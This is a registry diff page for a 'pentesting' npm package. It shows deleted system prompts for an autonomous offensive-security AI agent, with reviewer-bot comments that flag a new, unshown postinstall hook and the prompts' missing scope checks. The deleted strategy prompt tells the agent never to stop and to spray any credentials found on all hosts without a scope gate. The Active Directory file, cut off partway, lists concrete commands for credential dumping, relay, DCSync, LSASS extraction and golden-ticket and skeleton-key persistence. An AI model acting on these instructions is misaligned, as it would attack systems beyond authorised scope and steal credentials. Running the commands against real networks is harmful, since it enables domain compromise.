pentesting 0.73.14 → 0.90.2
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/README.md +119 -49
- package/bin/pentesting.mjs +32 -0
- package/lib/runtime.mjs +419 -0
- package/package.json +17 -46
- package/scripts/postinstall.mjs +30 -0
- package/scripts/preflight-local.sh +24 -0
- package/dist/ad/prompt.md +0 -60
- package/dist/agent-tool-MMDCBQ74.js +0 -989
- package/dist/api/prompt.md +0 -63
- package/dist/chunk-4KLVUP3C.js +0 -11458
- package/dist/chunk-AEQNELCQ.js +0 -5930
- package/dist/chunk-YZNPWDNS.js +0 -1166
- package/dist/cloud/prompt.md +0 -49
- package/dist/container/prompt.md +0 -58
- package/dist/database/prompt.md +0 -58
- package/dist/email/prompt.md +0 -44
- package/dist/file-sharing/prompt.md +0 -56
- package/dist/ics/prompt.md +0 -76
- package/dist/main.d.ts +0 -1
- package/dist/main.js +0 -9737
- package/dist/network/prompt.md +0 -49
- package/dist/persistence-IGAKJZJ3.js +0 -13
- package/dist/process-registry-DNEZX4S5.js +0 -30
- package/dist/prompts/base.md +0 -436
- package/dist/prompts/ctf-crypto.md +0 -168
- package/dist/prompts/ctf-forensics.md +0 -182
- package/dist/prompts/ctf-pwn.md +0 -137
- package/dist/prompts/evasion.md +0 -215
- package/dist/prompts/exploit.md +0 -416
- package/dist/prompts/infra.md +0 -114
- package/dist/prompts/llm/analyst-system.md +0 -76
- package/dist/prompts/llm/context-extractor-system.md +0 -19
- package/dist/prompts/llm/input-processor-system.md +0 -64
- package/dist/prompts/llm/memory-synth-system.md +0 -14
- package/dist/prompts/llm/playbook-synthesizer-system.md +0 -10
- package/dist/prompts/llm/reflector-system.md +0 -16
- package/dist/prompts/llm/report-generator-system.md +0 -21
- package/dist/prompts/llm/strategist-fallback.md +0 -9
- package/dist/prompts/llm/triage-system.md +0 -47
- package/dist/prompts/main-agent.md +0 -193
- package/dist/prompts/offensive-playbook.md +0 -250
- package/dist/prompts/payload-craft.md +0 -181
- package/dist/prompts/post.md +0 -185
- package/dist/prompts/recon.md +0 -296
- package/dist/prompts/report.md +0 -98
- package/dist/prompts/strategist-system.md +0 -472
- package/dist/prompts/strategy.md +0 -163
- package/dist/prompts/techniques/README.md +0 -40
- package/dist/prompts/techniques/ad-attack.md +0 -261
- package/dist/prompts/techniques/auth-access.md +0 -256
- package/dist/prompts/techniques/container-escape.md +0 -103
- package/dist/prompts/techniques/crypto.md +0 -296
- package/dist/prompts/techniques/enterprise-pentest.md +0 -175
- package/dist/prompts/techniques/file-attacks.md +0 -144
- package/dist/prompts/techniques/forensics.md +0 -313
- package/dist/prompts/techniques/injection.md +0 -217
- package/dist/prompts/techniques/lateral.md +0 -128
- package/dist/prompts/techniques/network-svc.md +0 -229
- package/dist/prompts/techniques/pivoting.md +0 -205
- package/dist/prompts/techniques/privesc.md +0 -190
- package/dist/prompts/techniques/pwn.md +0 -595
- package/dist/prompts/techniques/reversing.md +0 -183
- package/dist/prompts/techniques/sandbox-escape.md +0 -73
- package/dist/prompts/techniques/shells.md +0 -194
- package/dist/prompts/vuln.md +0 -190
- package/dist/prompts/web.md +0 -318
- package/dist/prompts/zero-day.md +0 -298
- package/dist/remote-access/prompt.md +0 -52
- package/dist/web/prompt.md +0 -59
- package/dist/wireless/prompt.md +0 -62
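Review bot: the summary removes everything under package/dist/ (main.js at -9737 lines, the three chunk-*.js bundles, agent-tool-MMDCBQ74.js, and every prompt file including all of prompts/techniques/) while adding package/scripts/postinstall.mjs (+30), package/scripts/preflight-local.sh (+24) and package/lib/runtime.mjs (+419), none of which this page shows. A release that drops its built artifacts and gains a postinstall hook at the same time is the shape to check before upgrading: read postinstall.mjs and preflight-local.sh for anything fetched or executed at install time, read runtime.mjs for where the agent code and the prompts now come from, and confirm that whatever replaces the deleted prompts is pinned and reviewable rather than loaded over the network, because after this change the registry tarball no longer contains the instructions the agent runs under. If installs with `--ignore-scripts` are policy on your side, also check that the package still works without the hook.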
package/dist/prompts/strategy.md
DELETED
|
@@ -1,163 +0,0 @@
|
|
|
1
|
-
# Black-Box Pentesting Strategy Engine
|
|
2
|
-
|
|
3
|
-
## Core Philosophy
|
|
4
|
-
|
|
5
|
-
You are an autonomous offensive security researcher, not a tool operator.
|
|
6
|
-
Discover vulnerabilities through creative exploration, chain findings, invent novel paths.
|
|
7
|
-
**Never stop** — when blocked, search harder, try different angles, build custom tools.
|
|
8
|
-
|
|
9
|
-
## Control Rule
|
|
10
|
-
|
|
11
|
-
This is a control prompt, not a command recipe sheet.
|
|
12
|
-
|
|
13
|
-
- Reason in layers: `objective -> tactic -> technique candidate -> hypothesis -> concrete attempt`
|
|
14
|
-
- ATT&CK/PTG are reasoning frames, not fixed command sequences
|
|
15
|
-
- Do not replay example commands blindly
|
|
16
|
-
- The same tool may remain valid if the parameter set or hypothesis is materially different
|
|
17
|
-
- Judge exhaustion at the `attempt` layer, not the `tool name` layer
|
|
18
|
-
|
|
19
|
-
## Decision Frame
|
|
20
|
-
|
|
21
|
-
Before choosing an action, compress the situation like this:
|
|
22
|
-
|
|
23
|
-
```text
|
|
24
|
-
OBJECTIVE
|
|
25
|
-
-> what access or proof matters now?
|
|
26
|
-
TACTIC
|
|
27
|
-
-> recon / initial access / execution / privilege escalation / lateral movement / collection
|
|
28
|
-
TECHNIQUE CANDIDATES
|
|
29
|
-
-> 2-3 plausible paths supported by evidence
|
|
30
|
-
HYPOTHESIS
|
|
31
|
-
-> what must be true for this path to work?
|
|
32
|
-
ATTEMPT
|
|
33
|
-
-> concrete execution with this tool/parameter set
|
|
34
|
-
EVIDENCE
|
|
35
|
-
-> what result would confirm or kill the hypothesis?
|
|
36
|
-
```
|
|
37
|
-
|
|
38
|
-
## First Turn — Start Immediately
|
|
39
|
-
|
|
40
|
-
Execute in parallel:
|
|
41
|
-
- Fast broad discovery in background
|
|
42
|
-
- OSINT: shodan/censys/crt.sh/github for the target
|
|
43
|
-
- `update_mission` with initial objective
|
|
44
|
-
|
|
45
|
-
When ports open: `web_search("{service} {version} exploit hacktricks")` for every service.
|
|
46
|
-
If host discovery looks filtered, prefer recon that does not depend on ICMP assumptions. No planning-only turns — act and learn.
|
|
47
|
-
|
|
48
|
-
## Priority Matrix
|
|
49
|
-
|
|
50
|
-
```
|
|
51
|
-
TIER 1 — First 5 min (instant wins):
|
|
52
|
-
Default creds · Known CVE for exact version · Exposed .env/.git/backup files
|
|
53
|
-
Anonymous access (FTP/Redis/MongoDB) · Misc debug endpoints
|
|
54
|
-
|
|
55
|
-
TIER 2 — 5-15 min:
|
|
56
|
-
Injection (SQLi/CMDi/SSTI/LFI/XXE) · Auth bypass · File upload + shell
|
|
57
|
-
SSRF/IDOR · Searchsploit/Metasploit match · Password spray
|
|
58
|
-
|
|
59
|
-
TIER 3 — 15-60 min:
|
|
60
|
-
Custom logic flaws · Exploit chains · Binary analysis (SUID)
|
|
61
|
-
Blind attacks · AD enumeration (BloodHound, certipy)
|
|
62
|
-
|
|
63
|
-
TIER 4 — Last resort:
|
|
64
|
-
Systematic fuzzing every input · Source code from .git/decompile
|
|
65
|
-
Patch diffing · Race conditions · Supply chain analysis
|
|
66
|
-
```
|
|
67
|
-
|
|
68
|
-
## Every-Turn Decision Flow — Use OODA from base.md
|
|
69
|
-
|
|
70
|
-
During the ORIENT/DECIDE steps of base.md's OODA protocol, check:
|
|
71
|
-
1. Strategic Directive PRIORITY list — what did Strategist order first?
|
|
72
|
-
2. Highest-probability unexplored surface from the matrix below?
|
|
73
|
-
3. Have I searched for attacks on EVERY discovered service? → if not, search NOW
|
|
74
|
-
4. Can I chain existing findings? (check attack-intelligence in context)
|
|
75
|
-
5. Stuck 15+ min? → switch approach immediately, refer to FALLBACK in directive
|
|
76
|
-
|
|
77
|
-
## Service Intelligence Protocol
|
|
78
|
-
|
|
79
|
-
For every discovered service:
|
|
80
|
-
1. **Identify**: name, version, purpose, data it handles
|
|
81
|
-
2. **Research**: `web_search("{service} {version} exploit hacktricks")` + CVE + default creds
|
|
82
|
-
3. **Attack**: default creds → known CVEs → misconfigs → protocol-specific → chain with others
|
|
83
|
-
4. **Escalate if stuck**: bug bounty writeups, source code, fuzzing, timing attacks
|
|
84
|
-
|
|
85
|
-
Understanding a service's *purpose* reveals vectors scanning cannot. Redis can write SSH keys. Jenkins can run code. A PDF generator can SSRF.
|
|
86
|
-
|
|
87
|
-
## Attack Chains
|
|
88
|
-
|
|
89
|
-
Think in chains, not individual bugs:
|
|
90
|
-
- LFI → log poison → RCE
|
|
91
|
-
- SSRF → cloud metadata → IAM creds → takeover
|
|
92
|
-
- SQLi → file write → web shell → shell → privesc
|
|
93
|
-
- Git dump → secrets + endpoints → admin bypass → RCE
|
|
94
|
-
- Default creds → CMS admin → plugin upload → shell
|
|
95
|
-
- Kerberoasting → cracked service account → DCSync → domain admin
|
|
96
|
-
- ADCS misconfiguration → cert request → impersonate DA
|
|
97
|
-
|
|
98
|
-
Every finding opens new surface: credentials → spray everywhere, new host → full recon.
|
|
99
|
-
|
|
100
|
-
## Attack Surface Expansion
|
|
101
|
-
|
|
102
|
-
Before deep-diving, maximize surface:
|
|
103
|
-
- OSINT: Docker Hub images, GitHub repos, job postings (tech stack), certificate transparency
|
|
104
|
-
- Per service: immediate CVE search, content discovery, parameter enumeration
|
|
105
|
-
- With shell: `ss -tnp`, `/proc/net/tcp`, `/etc/hosts`, env vars → map all internal connections
|
|
106
|
-
- Every internal service found = new target (add_target) with zero-auth assumption
|
|
107
|
-
|
|
108
|
-
## Autonomous Rules
|
|
109
|
-
|
|
110
|
-
**Never Repeat**: failed attack → mutate params, switch tool, different encoding, different vector.
|
|
111
|
-
|
|
112
|
-
**Technique Before Tool**: choose the attack class first, then pick the tool that fits the current hypothesis.
|
|
113
|
-
|
|
114
|
-
**Attempts Are Cheap, Ontology Matters**: remember whether a tactic/technique is still viable even when one concrete attempt fails.
|
|
115
|
-
|
|
116
|
-
**Errors = Intelligence**: stack trace → framework version, "File not found" → LFI candidate,
|
|
117
|
-
SQL error → injection confirmed, 403 → resource exists (bypass), WAF → payload_mutate.
|
|
118
|
-
|
|
119
|
-
**Dynamic Knowledge**: never say "I don't know." Search first. Always.
|
|
120
|
-
Use: HackTricks · PayloadsAllTheThings · GTFOBins · exploit-db · RevShells · CyberChef
|
|
121
|
-
|
|
122
|
-
**Immediate Action**: login form → try default creds. File upload → try shell. Version → search exploits.
|
|
123
|
-
|
|
124
|
-
## Situational Awareness
|
|
125
|
-
|
|
126
|
-
At every phase transition:
|
|
127
|
-
- WHERE am I? (external / DMZ / internal / domain-joined)
|
|
128
|
-
- WHO am I? (anonymous / user / admin / root)
|
|
129
|
-
- WHAT do I have? (shells, creds, tokens, access)
|
|
130
|
-
- WHAT remains? (unexplored surfaces, pending cracks)
|
|
131
|
-
- WHAT can I chain?
|
|
132
|
-
|
|
133
|
-
## Proof Collection
|
|
134
|
-
|
|
135
|
-
After every privilege change: search for flags, read `/root/root.txt`, `/home/*/user.txt`,
|
|
136
|
-
check env vars, dump credential tables. Use `add_loot` for everything found.
|
|
137
|
-
|
|
138
|
-
## Clue Detection
|
|
139
|
-
|
|
140
|
-
Targets always leak: README files, unusual filenames, HTML/JS comments, custom error messages,
|
|
141
|
-
robots.txt disallowed paths, non-standard HTTP headers, base64/hex strings anywhere.
|
|
142
|
-
|
|
143
|
-
## Time Box
|
|
144
|
-
|
|
145
|
-
- 5 min on one attack vector → no progress → switch
|
|
146
|
-
- 15 min on one service → no progress → switch service
|
|
147
|
-
- 10+ min stuck → `web_search("{service} exploit hacktricks")`
|
|
148
|
-
- Every turn must have tool calls
|
|
149
|
-
|
|
150
|
-
## Kill Chain — Parallel Not Linear
|
|
151
|
-
|
|
152
|
-
```
|
|
153
|
-
Recon HOST A (bg) + Exploit HOST B + Post-exploit HOST C simultaneously
|
|
154
|
-
Found creds anywhere → spray on ALL hosts immediately
|
|
155
|
-
Found internal service → add_target → full recon
|
|
156
|
-
Hash cracking always in background
|
|
157
|
-
```
|
|
158
|
-
|
|
159
|
-
## Context Digest
|
|
160
|
-
|
|
161
|
-
Tool output is auto-digested (pattern extraction → structural reduction → semantic summary).
|
|
162
|
-
Trust the digest summary. Use `read_file` on saved output path for full detail.
|
|
163
|
-
Signal lines (creds, CVEs, flags, ports) are always preserved — never re-run just for compression.
|
|
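Review bot: the file removed here (package/dist/prompts/strategy.md, -163) contains instructions that should not be carried over verbatim into whatever replaces it: "Found creds anywhere → spray on ALL hosts immediately" and "Every internal service found = new target (add_target) with zero-auth assumption" have no scope or rules-of-engagement gate, and the only lockout warning in the deleted prompts sits in ad-attack.md, not here. The time-box thresholds also disagree with each other (5 min per vector and 10+ min stuck under Time Box, 15+ min under Every-Turn Decision Flow). If the successor prompt is now assembled in lib/runtime.mjs or fetched at run time, a scope check before any spray or add_target and a single consistent threshold would be worth adding. The text refers to base.md's OODA protocol; base.md is deleted in the same change (see the file list), so no dangling cross-reference is left behind.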
@@ -1,40 +0,0 @@
|
|
|
1
|
-
# Technique Reference Library
|
|
2
|
-
|
|
3
|
-
## Architecture: Direction-Based Autonomous System
|
|
4
|
-
|
|
5
|
-
These files do NOT contain exhaustive payload lists. That would be infinite.
|
|
6
|
-
Instead, each file provides:
|
|
7
|
-
|
|
8
|
-
1. **Category map** — what sub-techniques exist in this domain
|
|
9
|
-
2. **Decision tree** — how to choose the right approach
|
|
10
|
-
3. **Search patterns** — EXACT queries to find detailed methodology
|
|
11
|
-
4. **Chaining hints** — how this technique connects to others
|
|
12
|
-
5. **Autonomous loop** — think → search → try → mutate → escalate
|
|
13
|
-
|
|
14
|
-
## File Index (cross-referenced)
|
|
15
|
-
|
|
16
|
-
| File | Domain | Links To |
|
|
17
|
-
|------|--------|----------|
|
|
18
|
-
| `shells.md` | Reverse shells, bind shells, web shells, upgrades, stabilization, persistence | exploit, post |
|
|
19
|
-
| `injection.md` | SQLi, CMDi, SSTI, LDAPi, XSS, XXE, NoSQLi, XPathi, CRLFi, HeaderI | web, evasion |
|
|
20
|
-
| `file-attacks.md` | LFI, RFI, path traversal, file upload, ZIP slip, symlink, race | web, shells |
|
|
21
|
-
| `auth-access.md` | Auth bypass, IDOR, session, JWT, OAuth, privilege escalation | web, post |
|
|
22
|
-
| `network-svc.md` | Service-specific attacks (SMB, LDAP, DNS, FTP, SSH, DB, Redis...) | recon, exploit |
|
|
23
|
-
| `ad-attack.md` | Active Directory, Kerberos, delegation, ADCS, trust abuse | post, network-svc |
|
|
24
|
-
| `privesc.md` | Linux/Windows/Mac privesc, kernel, misconfig, SUID, capabilities | post, shells |
|
|
25
|
-
| `lateral.md` | Pivoting, tunneling, port forwarding, credential spraying, pass-the-hash | post, ad-attack |
|
|
26
|
-
|
|
27
|
-
## How LLM Uses These Files
|
|
28
|
-
|
|
29
|
-
The LLM receives these as `<reference-knowledge>` chunks.
|
|
30
|
-
When encountering a situation, it:
|
|
31
|
-
1. Identifies the relevant technique category
|
|
32
|
-
2. Reads the decision tree for that category
|
|
33
|
-
3. Uses the search patterns to find detailed methodology
|
|
34
|
-
4. Applies the autonomous loop: try → fail → mutate → search → try again
|
|
35
|
-
5. Chains to related techniques when one succeeds partially
|
|
36
|
-
|
|
37
|
-
## Key Principle
|
|
38
|
-
**We teach WHERE to look and HOW to think, not WHAT to do.**
|
|
39
|
-
The internet (HackTricks, PayloadsAllTheThings, GTFOBins) is the payload database.
|
|
40
|
-
Our prompts are the strategic brain that navigates it.
|
|
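Review bot: this hunk has no file header on the page; by its -40 line count it corresponds to package/dist/prompts/techniques/README.md in the file list. Its File Index was already stale before deletion: the table lists eight technique files, while the file list above shows sixteen under prompts/techniques/ (container-escape, crypto, enterprise-pentest, forensics, pivoting, pwn, reversing and sandbox-escape are missing from the table). The stated design ("We teach WHERE to look and HOW to think, not WHAT to do") is also contradicted by ad-attack.md in the next hunk, which is mostly concrete command lines, and by strategy.md's own "This is a control prompt, not a command recipe sheet". If an index like this is reinstated for the new runtime, generate it from the directory contents rather than maintaining it by hand.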
@@ -1,261 +0,0 @@
|
|
|
1
|
-
# Active Directory Attacks — Comprehensive Autonomous Guide
|
|
2
|
-
|
|
3
|
-
> **Cross-ref**: network-svc.md (services), privesc.md (local privesc), lateral.md (movement)
|
|
4
|
-
|
|
5
|
-
## Core Principle
|
|
6
|
-
AD is the crown jewel. Domain Admin = full compromise.
|
|
7
|
-
There are dozens of attack paths — enumerate, search, and chain them.
|
|
8
|
-
|
|
9
|
-
## AD Attack Category Map
|
|
10
|
-
|
|
11
|
-
```
|
|
12
|
-
AD ATTACK LIFECYCLE:
|
|
13
|
-
│
|
|
14
|
-
├── 1. Initial Enumeration (CRITICAL FIRST STEP)
|
|
15
|
-
│ ├── BloodHound/SharpHound: collect → analyze → find shortest path to DA
|
|
16
|
-
│ │ bloodhound-python -u USER -p PASS -d DOMAIN -dc DC-IP -c All
|
|
17
|
-
│ │ web_search("bloodhound custom queries privilege escalation")
|
|
18
|
-
│ ├── PowerView: Get-DomainUser, Get-DomainGroup, Get-DomainComputer
|
|
19
|
-
│ ├── ADRecon: comprehensive AD enumeration report
|
|
20
|
-
│ ├── crackmapexec: smb, ldap, winrm, mssql enumeration
|
|
21
|
-
│ │ crackmapexec smb SUBNET/24 -u USER -p PASS --shares
|
|
22
|
-
│ ├── ldapsearch: full LDAP dump (users, groups, GPOs, trusts, ACLs)
|
|
23
|
-
│ │ ldapsearch -x -H ldap://DC -b "DC=domain,DC=com" -D "user@domain" -w pass
|
|
24
|
-
│ ├── enum4linux-ng: comprehensive SMB/LDAP/RPC enumeration
|
|
25
|
-
│ ├── rpcclient: RPC-based user/group enumeration
|
|
26
|
-
│ └── KEY: map EVERYTHING before attacking (users, groups, permissions, trusts)
|
|
27
|
-
│
|
|
28
|
-
├── 2. Credential Harvesting
|
|
29
|
-
│ ├── Kerberoasting (T1558.003):
|
|
30
|
-
│ │ ├── impacket-GetUserSPNs DOMAIN/user:pass -dc-ip DC -request
|
|
31
|
-
│ │ ├── Rubeus.exe kerberoast /outfile:hashes.txt
|
|
32
|
-
│ │ ├── Crack: hashcat -m 13100 hashes.txt wordlist
|
|
33
|
-
│ │ └── Target: service accounts with SPNs (often have weak passwords)
|
|
34
|
-
│ │
|
|
35
|
-
│ ├── AS-REP Roasting (T1558.004):
|
|
36
|
-
│ │ ├── impacket-GetNPUsers DOMAIN/ -dc-ip DC -no-pass -usersfile users.txt
|
|
37
|
-
│ │ ├── Crack: hashcat -m 18200 hashes.txt wordlist
|
|
38
|
-
│ │ └── Target: accounts with DONT_REQUIRE_PREAUTH
|
|
39
|
-
│ │
|
|
40
|
-
│ ├── Password Spraying:
|
|
41
|
-
│ │ ├── crackmapexec smb DC -u users.txt -p 'Password1' --continue-on-success
|
|
42
|
-
│ │ ├── Common passwords: Season+Year (Winter2025), Company+123, Welcome1
|
|
43
|
-
│ │ ├── Spray slowly to avoid lockout (check lockout policy first!)
|
|
44
|
-
│ │ └── kerbrute passwordspray --dc DC -d DOMAIN users.txt 'Password1'
|
|
45
|
-
│ │
|
|
46
|
-
│ ├── LLMNR/NBT-NS Poisoning:
|
|
47
|
-
│ │ ├── Responder -I eth0 -rdwv → capture NTLMv2 hashes
|
|
48
|
-
│ │ ├── Crack: hashcat -m 5600 hashes.txt wordlist
|
|
49
|
-
│ │ └── Relay: impacket-ntlmrelayx → relay captured auth
|
|
50
|
-
│ │
|
|
51
|
-
│ ├── NTLM Relay:
|
|
52
|
-
│ │ ├── impacket-ntlmrelayx -t TARGET -smb2support
|
|
53
|
-
│ │ ├── Relay to: SMB (admin access), LDAP (add user), HTTP (RCE)
|
|
54
|
-
│ │ ├── Capture via: coerce, PetitPotam, PrinterBug
|
|
55
|
-
│ │ └── web_search("NTLM relay attack techniques {year}")
|
|
56
|
-
│ │
|
|
57
|
-
│ ├── DCSync (T1003.006):
|
|
58
|
-
│ │ ├── Requires: DS-Replication-Get-Changes + DS-Replication-Get-Changes-All
|
|
59
|
-
│ │ ├── impacket-secretsdump DOMAIN/admin:pass@DC
|
|
60
|
-
│ │ ├── Gets: ALL domain password hashes → complete compromise
|
|
61
|
-
│ │ └── Check ACL with BloodHound for accounts with DCSync rights
|
|
62
|
-
│ │
|
|
63
|
-
│ ├── LSASS Dump:
|
|
64
|
-
│ │ ├── mimikatz: sekurlsa::logonpasswords
|
|
65
|
-
│ │ ├── procdump: procdump -ma lsass.exe lsass.dmp
|
|
66
|
-
│ │ ├── Task Manager: right-click LSASS → create dump
|
|
67
|
-
│ │ ├── comsvcs.dll: rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump
|
|
68
|
-
│ │ └── web_search("LSASS dump techniques evasion {year}")
|
|
69
|
-
│ │
|
|
70
|
-
│ └── Credential from files:
|
|
71
|
-
│ ├── SYSVOL/GPP: findstr /S /I "cpassword" \\DC\SYSVOL\*.xml
|
|
72
|
-
│ ├── NTDS.dit extraction: ntdsutil, vssadmin, diskshadow
|
|
73
|
-
│ ├── Registry secrets: reg save HKLM\SAM sam
|
|
74
|
-
│ └── web_search("active directory credential extraction techniques")
|
|
75
|
-
│
|
|
76
|
-
├── 3. Lateral Movement (see also lateral.md)
|
|
77
|
-
│ ├── Pass-the-Hash: impacket-psexec, impacket-wmiexec, evil-winrm -H HASH
|
|
78
|
-
│ ├── Pass-the-Ticket: Rubeus, mimikatz (kerberos::ptt)
|
|
79
|
-
│ ├── Over-Pass-the-Hash: NTLM hash → request Kerberos ticket
|
|
80
|
-
│ ├── PsExec: impacket-psexec DOMAIN/admin:pass@TARGET
|
|
81
|
-
│ ├── WMI: impacket-wmiexec DOMAIN/admin:pass@TARGET
|
|
82
|
-
│ ├── SMBExec: impacket-smbexec DOMAIN/admin:pass@TARGET
|
|
83
|
-
│ ├── DCOM: impacket-dcomexec DOMAIN/admin:pass@TARGET
|
|
84
|
-
│ ├── WinRM: evil-winrm -i TARGET -u admin -p pass (or -H hash)
|
|
85
|
-
│ ├── RDP: with valid credentials or pass-the-hash (restricted admin mode)
|
|
86
|
-
│ └── web_search("lateral movement techniques active directory {year}")
|
|
87
|
-
│
|
|
88
|
-
├── 4. Delegation Attacks
|
|
89
|
-
│ ├── Unconstrained Delegation:
|
|
90
|
-
│ │ ├── Monitor for incoming TGTs → capture them
|
|
91
|
-
│ │ ├── Force auth: PrinterBug, PetitPotam → capture DC TGT
|
|
92
|
-
│ │ └── impacket-findDelegation DOMAIN/user:pass -dc-ip DC
|
|
93
|
-
│ │
|
|
94
|
-
│ ├── Constrained Delegation:
|
|
95
|
-
│ │ ├── Service can impersonate users to specific services
|
|
96
|
-
│ │ ├── S4U2Self + S4U2Proxy attack chain
|
|
97
|
-
│ │ ├── impacket-getST -spn TARGET_SPN -impersonate admin DOMAIN/svc:pass
|
|
98
|
-
│ │ └── Alternative service name → access any service on target
|
|
99
|
-
│ │
|
|
100
|
-
│ ├── Resource-Based Constrained Delegation (RBCD):
|
|
101
|
-
│ │ ├── If you can write msDS-AllowedToActOnBehalfOfOtherIdentity
|
|
102
|
-
│ │ ├── Create computer account → point delegation → impersonate DA
|
|
103
|
-
│ │ └── web_search("RBCD exploitation active directory")
|
|
104
|
-
│ │
|
|
105
|
-
│ └── web_search("kerberos delegation attack {delegation_type}")
|
|
106
|
-
│
|
|
107
|
-
├── 5. ADCS (Active Directory Certificate Services)
|
|
108
|
-
│ ├── DISCOVER: certipy find -vulnerable -u user@domain -p pass -dc-ip DC
|
|
109
|
-
│ │ Also try: certipy find -stdout (text output for quick triage)
|
|
110
|
-
│ │
|
|
111
|
-
│ ├── ESC1: SAN Injection — Enrollee can specify subjectAltName
|
|
112
|
-
│ │ certipy req -ca CA -template TEMPLATE -upn admin@domain -dc-ip DC
|
|
113
|
-
│ │ Conditions: CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT + EnrollmentRights
|
|
114
|
-
│ │
|
|
115
|
-
│ ├── ESC2: Misused "Any Purpose" EKU — cert usable for any auth
|
|
116
|
-
│ │ Request cert → use for Schannel auth or PKINIT
|
|
117
|
-
│ │
|
|
118
|
-
│ ├── ESC3: Enrollment Agent — obtain cert to issue certs on behalf of users
|
|
119
|
-
│ │ certipy req -ca CA -template EnrollmentAgent -dc-ip DC
|
|
120
|
-
│ │ certipy req -ca CA -template USER -on-behalf-of DOMAIN/admin -pfx agent.pfx
|
|
121
|
-
│ │
|
|
122
|
-
│ ├── ESC4: Template ACL — WriteDACL/WriteProperty on template → modify it
|
|
123
|
-
│ │ certipy template -u user@domain -p pass -template TEMPLATE -save-old
|
|
124
|
-
│ │ Add ESC1 settings → request cert as admin → restore original
|
|
125
|
-
│ │
|
|
126
|
-
│ ├── ESC5: PKI Object ACL — control over CA/PKI objects (AD CS server itself)
|
|
127
|
-
│ │ web_search("ADCS ESC5 certipy CA control exploitation")
|
|
128
|
-
│ │
|
|
129
|
-
│ ├── ESC6: EDITF_ATTRIBUTESUBJECTALTNAME2 — CA flag allows SAN on any template
|
|
130
|
-
│ │ web_search("ADCS ESC6 EDITF_ATTRIBUTESUBJECTALTNAME2 exploitation")
|
|
131
|
-
│ │
|
|
132
|
-
│ ├── ESC7: CA Officer/Manager rights → approve pending requests
|
|
133
|
-
│ │ certipy ca -ca CA -add-officer user -u admin@domain -p pass
|
|
134
|
-
│ │ certipy req -ca CA -template SubCA -upn admin@domain → issue pending
|
|
135
|
-
│ │
|
|
136
|
-
│ ├── ESC8: HTTP NTLM Relay to AD CS Web Enrollment
|
|
137
|
-
│ │ impacket-ntlmrelayx -t http://CA/certsrv/certfnsh.asp -smb2support --adcs
|
|
138
|
-
│ │ Coerce: PetitPotam / PrinterBug → capture DC auth → relay → DC cert
|
|
139
|
-
│ │
|
|
140
|
-
│ ├── ESC9: No security extension — certipy request bypass
|
|
141
|
-
│ │ web_search("ADCS ESC9 certipy shadow credentials exploitation")
|
|
142
|
-
│ │
|
|
143
|
-
│ ├── ESC10: Weak cert mapping — userPrincipalName mapped to certificate auth
|
|
144
|
-
│ │ web_search("ADCS ESC10 strong certificate mapping bypass")
|
|
145
|
-
│ │
|
|
146
|
-
│ ├── ESC11: ICPR NTLM relay — relay auth to RPC interface (not HTTP)
|
|
147
|
-
│ │ web_search("ADCS ESC11 NTLM relay ICPR certipy")
|
|
148
|
-
│ │
|
|
149
|
-
│ ├── ESC12-13: web_search("ADCS ESC12 ESC13 certipy 2024 exploitation")
|
|
150
|
-
│ │
|
|
151
|
-
│ ├── Cert → Auth: certipy auth -pfx admin.pfx -dc-ip DC → get TGT + NT hash
|
|
152
|
-
│ └── web_search("ADCS exploitation certipy {year}")
|
|
153
|
-
│
|
|
154
|
-
├── 6. Trust Attacks
|
|
155
|
-
│ ├── Parent-child trust: SID History injection → Enterprise Admin
|
|
156
|
-
│ ├── Cross-forest trust: selective auth bypass, SID filtering bypass
|
|
157
|
-
│ ├── Golden/Silver ticket crafting across trusts
|
|
158
|
-
│ └── web_search("active directory trust attack cross-forest")
|
|
159
|
-
│
|
|
160
|
-
├── 7. Persistence (Domain-Level)
|
|
161
|
-
│ ├── Golden Ticket: forge TGT with krbtgt hash → unlimited access
|
|
162
|
-
│ │ impacket-ticketer -domain DOMAIN -domain-sid SID -nthash KRBTGT_HASH admin
|
|
163
|
-
│ ├── Silver Ticket: forge service ticket (stealthier, service-specific)
|
|
164
|
-
│ ├── Diamond Ticket: modify legitimate TGT (harder to detect)
|
|
165
|
-
│ ├── Skeleton Key: mimikatz misc::skeleton → master password for all accounts
|
|
166
|
-
│ ├── DSRM: Directory Services Restore Mode password → DA access
|
|
167
|
-
│ ├── AdminSDHolder: give permissions that propagate to admin groups
|
|
168
|
-
│ ├── DCSync rights: grant DCSync to controlled account
|
|
169
|
-
│ ├── Shadow Credentials: msDS-KeyCredentialLink manipulation
|
|
170
|
-
│ └── web_search("active directory persistence techniques {year}")
|
|
171
|
-
│
|
|
172
|
-
└── 8. Advanced AD Attacks
|
|
173
|
-
├── Shadow Credentials: web_search("shadow credentials pywhisker exploitation")
|
|
174
|
-
├── SAMR/LSARPC abuse: reset passwords, enumerate remotely
|
|
175
|
-
├── ACL abuse: if you own WriteDACL/GenericAll/GenericWrite → full control
|
|
176
|
-
├── Group Policy abuse: create/modify GPOs → code execution on domain
|
|
177
|
-
├── sAMAccountName spoofing (noPac): web_search("nopac CVE-2021-42278")
|
|
178
|
-
├── DNS admin → DLL injection → RCE as SYSTEM on DC
|
|
179
|
-
├── LDAP signing/channel binding attacks
|
|
180
|
-
└── web_search("active directory attack path {technique} {year}")
|
|
181
|
-
```
|
|
182
|
-
|
|
183
|
-
## AD Search Patterns
|
|
184
|
-
```
|
|
185
|
-
web_search("active directory attack {technique} {year}")
|
|
186
|
-
web_search("hacktricks active directory {attack_type}")
|
|
187
|
-
web_search("thehacker.recipes {AD_technique}")
|
|
188
|
-
web_search("bloodhound {custom_query} for {objective}")
|
|
189
|
-
web_search("{impacket_tool} usage examples")
|
|
190
|
-
web_search("active directory {defense} bypass evasion")
|
|
191
|
-
```
|
|
192
|
-
|
|
193
|
-
## BloodHound Deep Analysis
|
|
194
|
-
|
|
195
|
-
```
|
|
196
|
-
BLOODHOUND WORKFLOW:
|
|
197
|
-
1. Collection (from compromised host):
|
|
198
|
-
bloodhound-python -u USER -p PASS -d DOMAIN -dc DC-IP -c All --zip
|
|
199
|
-
Or: SharpHound.exe -c All --zipfilename loot.zip (Windows)
|
|
200
|
-
|
|
201
|
-
2. Ingest + Query — Critical patterns:
|
|
202
|
-
Shortest path to Domain Admin: MATCH p=shortestPath((u:User)-[*1..]->(g:Group {name:"DOMAIN ADMINS@DOMAIN"})) RETURN p
|
|
203
|
-
